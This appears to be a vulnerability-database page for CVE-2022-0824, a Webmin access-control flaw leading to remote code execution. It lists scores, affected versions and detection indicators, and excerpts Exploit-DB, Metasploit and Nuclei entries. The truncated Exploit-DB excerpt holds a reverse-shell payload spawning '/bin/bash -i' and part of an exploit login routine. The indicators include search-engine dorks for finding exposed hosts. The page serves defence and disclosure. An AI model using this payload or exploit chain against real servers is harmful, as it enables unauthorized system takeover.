CVE-2022-0824
published 2022-03-02CVE-2022-0824: Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.
PriorityP279high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
96.98%
99.9th percentile
Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| webmin | webmin | < 1.990 | 1.990 |
| webmin | webmin_webmin | >= unspecified < 1.990 | 1.990 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated or low-privilege POST requests to the File Manager download endpoint; the parameter 'link' is used to fetch a remote URL and stage a malicious CGI payload. ↗
- →Alert on POST requests to /extensions/file-manager/chmod.cgi setting permissions to 0755 on newly uploaded files, especially .cgi files — this is the privilege escalation step in the exploit chain. ↗
- →Monitor for HTTP requests containing the header 'X-Requested-With: XMLHttpRequest' combined with a POST to /extensions/file-manager/http_download.cgi, which is the download-trigger step of the exploit. ↗
- →Use Shodan/FOFA/Google dork queries to identify exposed Webmin instances as potential targets: shodan 'http.title:"webmin"', FOFA 'title="webmin"', Google 'intitle:"webmin"'. ↗
- →Detect the exploit's login step by watching for POST to /session_login.cgi with cookies 'redirect=1; testing=1; PHPSESSID=' (empty PHPSESSID), which is a fingerprint of automated exploit tooling. ↗
- →Flag creation or execution of .cgi files under /usr/share/webmin — the exploit uploads a reverse shell CGI to this path and then GETs it to trigger execution. ↗
- →The Nuclei template confirms exploitation by detecting the error string 'Failed to write to /<path>/index.html' in the HTTP response body from the http_download.cgi endpoint. ↗
- ·The exploit targets Webmin versions prior to 1.990; version 1.984 is explicitly confirmed vulnerable. Instances patched to 1.990+ are not affected. ↗
- ·The default upload path /usr/share/webmin applies to Debian package installations only; other installation methods may place Webmin in a different directory, affecting where the malicious CGI is staged. ↗
- ·Exploitation requires valid credentials for any low-privilege authenticated user; unauthenticated exploitation is not possible with this CVE alone. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv3.08.3HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Webmin 1.984 - Remote Code Execution (Authenticated)
exploitdb·2022-03-09·CVSS 8.8
CVE-2022-0824 [HIGH] Webmin 1.984 - Remote Code Execution (Authenticated)
Webmin 1.984 - Remote Code Execution (Authenticated)
---
# Exploit Title: Webmin 1.984 - Remote Code Execution (Authenticated)
# Date: 2022-03-06
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://github.com/webmin/webmin/archive/refs/tags/1.984.zip
# Version: &S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''')
print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC)
f = open(f"{self.fname}", "w")
f.write(payload)
f.close()
def login(self):
login_url = self.target + "/session_login.cgi"
cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" }
data = { 'user' : self.username, 'pass' : self.password }
try:
r = self.s.post(login_url, data=data, cookies=co
Metasploit
Webmin File Manager RCE
metasploit
Webmin File Manager RCE
Webmin File Manager RCE
In Webmin version 1.984, any authenticated low privilege user without access rights to the File Manager module could interact with file manager functionalities such as downloading files from remote URLs and changing file permissions. It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those functionalities in the file manager.
Nuclei
Webmin <1.990 - Improper Access Control
nuclei·CVSS 8.8
CVE-2022-0824 [HIGH] Webmin <1.990 - Improper Access Control
Webmin <1.990 - Improper Access Control
Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: CVE-2022-0824
info:
name: Webmin <1.990 - Improper Access Control
author: cckuailong
severity: high
description: Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessar
No writeups or analysis indexed.
http://packetstormsecurity.com/files/166240/Webmin-1.984-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/169700/Webmin-1.984-File-Manager-Remote-Code-Execution.htmlhttps://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295https://notes.netbytesec.com/2022/03/webmin-broken-access-control-to-post-auth-rce.htmlhttp://packetstormsecurity.com/files/166240/Webmin-1.984-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/169700/Webmin-1.984-File-Manager-Remote-Code-Execution.htmlhttps://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295https://notes.netbytesec.com/2022/03/webmin-broken-access-control-to-post-auth-rce.html
2022-03-02
Published